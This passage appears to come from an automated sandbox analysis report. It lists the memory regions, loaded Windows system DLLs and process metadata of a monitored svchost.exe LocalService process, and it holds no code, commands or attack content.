region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1516 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1517 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1518 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1519 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1520 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1521 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1522 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1523 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1524 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1525 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1526 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1527 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1528 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1529 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1530 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1531 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1532 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1533 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1534 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1535 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 1537 start_va = 0x2a60000 end_va = 0x2b78fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a60000" filename = "" Thread: id = 83 os_tid = 0x10ec Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3ebd1000" os_pid = "0x120" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xa], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\PhoneSvc" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\tzautoupdate" [0xe], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d12f" [0xc000000f], "LOCAL" [0x7] Region: id = 1550 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1551 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1552 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1553 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1554 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1555 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1556 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1557 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1558 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1559 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1560 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1561 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1562 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1563 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1564 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1565 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1566 start_va = 0x560000 end_va = 0x566fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1567 start_va = 0x570000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1568 start_va = 0x5f0000 end_va = 0x5f1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netprofmsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui") Region: id = 1569 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1570 start_va = 0x700000 end_va = 0x748fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 1571 start_va = 0x750000 end_va = 0x77dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 1572 start_va = 0x780000 end_va = 0x781fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 1573 start_va = 0x790000 end_va = 0x791fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 1574 start_va = 0x7a0000 end_va = 0x7b1fff monitored = 0 entry_point = 0x7c7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1575 start_va = 0x7c0000 end_va = 0x7c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 1576 start_va = 0x7d0000 end_va = 0x7d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 1577 start_va = 0x7f0000 end_va = 0x7f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 1578 start_va = 0x870000 end_va = 0x876fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1579 start_va = 0x880000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 1580 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1581 start_va = 0xa00000 end_va = 0xb87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 1582 start_va = 0xb90000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 1583 start_va = 0xd20000 end_va = 0x111afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 1584 start_va = 0x1120000 end_va = 0x11fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1585 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1586 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 1587 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 1588 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 1589 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 1590 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 1591 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1592 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 1593 start_va = 0x1b00000 end_va = 0x2afffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 1594 start_va = 0x2b00000 end_va = 0x2e36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1595 start_va = 0x2e40000 end_va = 0x2f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 1596 start_va = 0x2f50000 end_va = 0x2f56fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 1597 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 1598 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 1599 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 1600 start_va = 0x3740000 end_va = 0x383ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1601 start_va = 0x3840000 end_va = 0x393ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 1602 start_va = 0x3940000 end_va = 0x3a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003940000" filename = "" Region: id = 1603 start_va = 0x3a40000 end_va = 0x3b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a40000" filename = "" Region: id = 1604 start_va = 0x3b40000 end_va = 0x3c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b40000" filename = "" Region: id = 1605 start_va = 0x3c40000 end_va = 0x3d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c40000" filename = "" Region: id = 1606 start_va = 0x3d40000 end_va = 0x3e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 1607 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 1608 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 1609 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1610 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1611 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1612 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1613 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1614 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 1615 start_va = 0x4a00000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 1616 start_va = 0x4b00000 end_va = 0x52fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 1617 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 1618 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1619 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1620 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1621 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1622 start_va = 0x7ff6a1cd0000 end_va = 0x7ff6a1cdcfff monitored = 0 entry_point = 0x7ff6a1cd3980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1623 start_va = 0x7ff86e3a0000 end_va = 0x7ff86e464fff monitored = 0 entry_point = 0x7ff86e3ae740 region_type = mapped_file name = "windows.web.dll" filename = "\\Windows\\System32\\Windows.Web.dll" (normalized: "c:\\windows\\system32\\windows.web.dll") Region: id = 1624 start_va = 0x7ff8718c0000 end_va = 0x7ff8718d7fff monitored = 0 entry_point = 0x7ff8718c4a20 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 1625 start_va = 0x7ff8720f0000 end_va = 0x7ff87210cfff monitored = 0 entry_point = 0x7ff8720f6190 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 1626 start_va = 0x7ff876220000 end_va = 0x7ff876499fff monitored = 0 entry_point = 0x7ff87623a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 1627 start_va = 0x7ff8764a0000 end_va = 0x7ff8764affff monitored = 0 entry_point = 0x7ff8764a1690 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 1628 start_va = 0x7ff876ee0000 end_va = 0x7ff876f01fff monitored = 0 entry_point = 0x7ff876ef2540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 1629 start_va = 0x7ff876f10000 end_va = 0x7ff876fe4fff monitored = 0 entry_point = 0x7ff876f2cf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1630 start_va = 0x7ff876ff0000 end_va = 0x7ff8770a1fff monitored = 0 entry_point = 0x7ff87700f750 region_type = mapped_file name = "windows.security.authentication.onlineid.dll" filename = "\\Windows\\System32\\Windows.Security.Authentication.OnlineId.dll" (normalized: "c:\\windows\\system32\\windows.security.authentication.onlineid.dll") Region: id = 1631 start_va = 0x7ff8770b0000 end_va = 0x7ff877143fff monitored = 0 entry_point = 0x7ff8770e9210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 1632 start_va = 0x7ff877150000 end_va = 0x7ff8773f2fff monitored = 0 entry_point = 0x7ff877176190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 1633 start_va = 0x7ff877400000 end_va = 0x7ff877415fff monitored = 0 entry_point = 0x7ff87740b550 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 1634 start_va = 0x7ff877420000 end_va = 0x7ff87755cfff monitored = 0 entry_point = 0x7ff87743a6a0 region_type = mapped_file name = "licensemanager.dll" filename = "\\Windows\\System32\\LicenseManager.dll" (normalized: "c:\\windows\\system32\\licensemanager.dll") Region: id = 1635 start_va = 0x7ff877560000 end_va = 0x7ff87756afff monitored = 0 entry_point = 0x7ff877561a20 region_type = mapped_file name = "licensemanagersvc.dll" filename = "\\Windows\\System32\\LicenseManagerSvc.dll" (normalized: "c:\\windows\\system32\\licensemanagersvc.dll") Region: id = 1636 start_va = 0x7ff877cf0000 end_va = 0x7ff877d0dfff monitored = 0 entry_point = 0x7ff877cf1690 region_type = mapped_file name = "bluetoothapis.dll" filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll") Region: id = 1637 start_va = 0x7ff877d10000 end_va = 0x7ff877d28fff monitored = 0 entry_point = 0x7ff877d12180 region_type = mapped_file name = "bthradiomedia.dll" filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll") Region: id = 1638 start_va = 0x7ff877d90000 end_va = 0x7ff877da3fff monitored = 0 entry_point = 0x7ff877d91a50 region_type = mapped_file name = "wlanradiomanager.dll" filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll") Region: id = 1639 start_va = 0x7ff877db0000 end_va = 0x7ff877db9fff monitored = 0 entry_point = 0x7ff877db14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1640 start_va = 0x7ff8797d0000 end_va = 0x7ff8797ddfff monitored = 0 entry_point = 0x7ff8797d1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1641 start_va = 0x7ff879920000 end_va = 0x7ff8799aafff monitored = 0 entry_point = 0x7ff87993d2a0 region_type = mapped_file name = "netprofmsvc.dll" filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll") Region: id = 1642 start_va = 0x7ff879e60000 end_va = 0x7ff879e6bfff monitored = 0 entry_point = 0x7ff879e614d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 1643 start_va = 0x7ff87a240000 end_va = 0x7ff87a307fff monitored = 0 entry_point = 0x7ff87a2813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1644 start_va = 0x7ff87a310000 end_va = 0x7ff87a370fff monitored = 0 entry_point = 0x7ff87a314b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1645 start_va = 0x7ff87a620000 end_va = 0x7ff87a648fff monitored = 0 entry_point = 0x7ff87a6324d0 region_type = mapped_file name = "fontprovider.dll" filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll") Region: id = 1646 start_va = 0x7ff87a650000 end_va = 0x7ff87a7f1fff monitored = 0 entry_point = 0x7ff87a69c2d0 region_type = mapped_file name = "fntcache.dll" filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll") Region: id = 1647 start_va = 0x7ff87a9b0000 end_va = 0x7ff87a9c9fff monitored = 0 entry_point = 0x7ff87a9b2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1648 start_va = 0x7ff87a9d0000 end_va = 0x7ff87a9e5fff monitored = 0 entry_point = 0x7ff87a9d19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1649 start_va = 0x7ff87a9f0000 end_va = 0x7ff87aa27fff monitored = 0 entry_point = 0x7ff87aa08cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1650 start_va = 0x7ff87aa30000 end_va = 0x7ff87aa3afff monitored = 0 entry_point = 0x7ff87aa31d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1651 start_va = 0x7ff87aa90000 end_va = 0x7ff87aaa5fff monitored = 0 entry_point = 0x7ff87aa91b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1652 start_va = 0x7ff87aaf0000 end_va = 0x7ff87ab1bfff monitored = 0 entry_point = 0x7ff87aaf1d20 region_type = mapped_file name = "authbroker.dll" filename = "\\Windows\\System32\\AuthBroker.dll" (normalized: "c:\\windows\\system32\\authbroker.dll") Region: id = 1653 start_va = 0x7ff87ad10000 end_va = 0x7ff87adc0fff monitored = 0 entry_point = 0x7ff87ad81ca0 region_type = mapped_file name = "windows.security.authentication.web.core.dll" filename = "\\Windows\\System32\\Windows.Security.Authentication.Web.Core.dll" (normalized: "c:\\windows\\system32\\windows.security.authentication.web.core.dll") Region: id = 1654 start_va = 0x7ff87b0f0000 end_va = 0x7ff87b106fff monitored = 0 entry_point = 0x7ff87b0f6620 region_type = mapped_file name = "msauserext.dll" filename = "\\Windows\\System32\\msauserext.dll" (normalized: "c:\\windows\\system32\\msauserext.dll") Region: id = 1655 start_va = 0x7ff87b620000 end_va = 0x7ff87b669fff monitored = 0 entry_point = 0x7ff87b62ac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 1656 start_va = 0x7ff87b710000 end_va = 0x7ff87b742fff monitored = 0 entry_point = 0x7ff87b71d5a0 region_type = mapped_file name = "biwinrt.dll" filename = "\\Windows\\System32\\biwinrt.dll" (normalized: "c:\\windows\\system32\\biwinrt.dll") Region: id = 1657 start_va = 0x7ff87b750000 end_va = 0x7ff87b7e1fff monitored = 0 entry_point = 0x7ff87b79a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1658 start_va = 0x7ff87b7f0000 end_va = 0x7ff87b868fff monitored = 0 entry_point = 0x7ff87b807800 region_type = mapped_file name = "geolocation.dll" filename = "\\Windows\\System32\\Geolocation.dll" (normalized: "c:\\windows\\system32\\geolocation.dll") Region: id = 1659 start_va = 0x7ff87bb00000 end_va = 0x7ff87be81fff monitored = 0 entry_point = 0x7ff87bb51220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1660 start_va = 0x7ff87be90000 end_va = 0x7ff87bfc5fff monitored = 0 entry_point = 0x7ff87bebf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1661 start_va = 0x7ff87d620000 end_va = 0x7ff87d62cfff monitored = 0 entry_point = 0x7ff87d622650 region_type = 